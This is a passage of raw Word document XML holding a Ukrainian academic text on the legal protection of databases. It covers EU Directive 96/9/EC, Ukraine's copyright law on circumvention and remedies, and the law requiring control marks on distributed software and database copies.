      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [15]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B661A" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Прикладом такого документу є положення Директиви ЄЕС №96/9/ЕС від 11.03.96 р. про правову охорону баз даних. У цьому разі доступ до бази даних обмежується певним колом користувачів, що приймали участь у її створенні. Сьогодні в Україні копіювання інформації, яка міститься у базі даних, і розміщення її в іншому місті, не є порушенням авторського права її виконавця. Авторські права на базу даних, у загальному випадку, належать розробнику бази даних, а не замовнику [14]. Замовнику ж належать права на дані з цієї бази. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4858E436" w14:textId="3D2BBAAF" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Закон «Про авторське право і суміжні права» не дає власнику бази даних ексклюзивного права на всі дані, які в ній містяться. Якщо дані отримано з інших відкритих джерел, то будь-які інші особи мають право їх використовувати для власних потреб</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [14]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1537D39F" w14:textId="4D7BBA08" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>У статті 50 Закону України «Про авторське право і суміжні права» сказано, що «…будь-які дії для свідомого обходу технічних засобів захисту авторського права і (або) суміжних прав, зокрема виготовлення, розповсюдження, ввезення з метою розповсюдження і застосування засобів для такого обходу є порушенням авторського права і (або) суміжних прав, що дає підстави для судового захисту». Це означає, що копіювання інформацій з бази даних з використанням засобів обходу технічного захисту вже має розглядатись як порушення авторських прав</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [14]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE32BC" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>У разі, якщо права розробника бази даних порушені, то, у відповідності до статті 52 зазначеного закону, він має право на відшкодування своїх збитків шляхом звернення до суду. При визначенні подібних порушень розробник також має право знищення незаконно створених порушником баз даних. Для доказу факту порушення авторських прав позивачеві необхідно довести наступні факти:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AD2413" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">що саме йому належать авторські права на конкретну базу даних; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4DB534" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">що саме відповідач розповсюджує (продає) базу даних; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D96F6" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>що саме та база даних, яку розповсюджує відповідач, належить позивачеві;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550513A3" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>що розповсюдження бази даних відбувається без згоди позивача.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECF3DDD" w14:textId="731AD621" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Слід також мати на увазі, що розповсюдження бази даних має на увазі розповсюдження точної її копії, а не її частини або її модифікації. Для доказу цього факту має бути призначена експертиза, яка доведе (або не доведе) абсолютну відповідність копії оригіналу</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [15]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F852579" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FB52CC" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00B63070" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc516752122"/>
      <w:bookmarkStart w:id="24" w:name="_Toc30433106"/>
      <w:r w:rsidRPr="00B63070">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.4.2 Закон України «Про розповсюдження примірників аудіовізуальних творів, фонограм, відеограм, комп’ютерних програм, баз даних»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="41A42CA8" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00EC4085" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52520CFC" w14:textId="39B2B309" w:rsidR="00BA24D7" w:rsidRPr="006A221B" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В нашому законодавстві є ще Закон України в редакції від 10 липня 2003 р. № 1098-IV «Про розповсюдження примірників аудіовізуальних творів, фонограм, відеограм, комп’ютерних програм, баз даних»</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [15]</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C9053A" w14:textId="551AFE0A" w:rsidR="00BA24D7" w:rsidRPr="002C13E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Цей Закон визначає правові основи розповсюдження примірників комп`ютерних програм, баз даних і спрямований на захист інтересів суб`єктів авторського права і суміжних прав споживачів</w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="002C13E9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA4834" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="006A221B" w:rsidRDefault="00BA24D7" w:rsidP="00BA24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6A221B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Ст.3</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Розповсюдження на території України примірників аудіовізуальних творів, фонограм, відеограм, комп'ютерних програм та  баз  даних,  а  також  їх прокат дозволяються лише за умови їх маркування контрольними марками. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21892155" w14:textId="30F4D267" w:rsidR="00BA24D7" w:rsidRPr="0001493A" w:rsidRDefault="00BA24D7" w:rsidP="00FB61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eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Ст.8 п.4</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Придбання примірника аудіовізуального твору,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>фонограми, відеограми,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>комп'ютерної</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>програми,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>бази</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>даних,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>маркованого контрольною</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>маркою,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>є</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>набуттям</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>прав на публічне виконання, публічний</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>показ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>публічну</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>демонстрацію,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>публічне</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>сповіщення, майновий найм, побутовий чи комерційний прокат записаного на цьому примірнику</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>аудіовізуального</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>твору,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>фонограми,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">відеограми, комп'ютерної програми, бази даних. </w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="0001493A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A1F293" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="006A221B" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ст.5</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Порядок одержання контрольних марок  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE3A9D4" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00B63070" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Для одержання контрольних марок особи, зазначені в частині </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>першій статті 4 цього Закону (далі - заявники),</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
